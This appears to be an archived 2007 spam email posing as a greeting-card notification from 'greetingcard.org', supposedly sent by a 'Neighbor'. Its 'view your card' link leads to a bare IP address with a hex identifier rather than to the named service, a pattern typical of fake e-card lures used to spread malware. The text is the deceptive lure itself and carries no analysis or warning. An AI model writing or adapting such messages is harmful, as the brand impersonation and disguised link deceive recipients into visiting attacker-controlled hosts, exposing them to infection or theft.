Subject: Neighbor sent you a greeting card from greetingcard.org!

From: "greetingcard.org" <[email-masked]>
Date: Fri, 10 Aug 2007 12:56:01 +0300

Neighbor has created a greeting card for you at greetingcard.org,
the Internet's most popular greeting card service. 

Your greeting card ID is: 4eac804814655dc21c83715e8517a32e6b9ea6 

To see your custom greeting card, simply click on the link below: 
http://61.81.211.151/?4eac804814655dc21c83715e8517a32e6b9ea6

Send greeting cards from greetingcard.org whenever you want by visiting us at: 
http://greetingcard.org/
Copyright (c) 1996-2007 greetingcard.org All Rights Reserved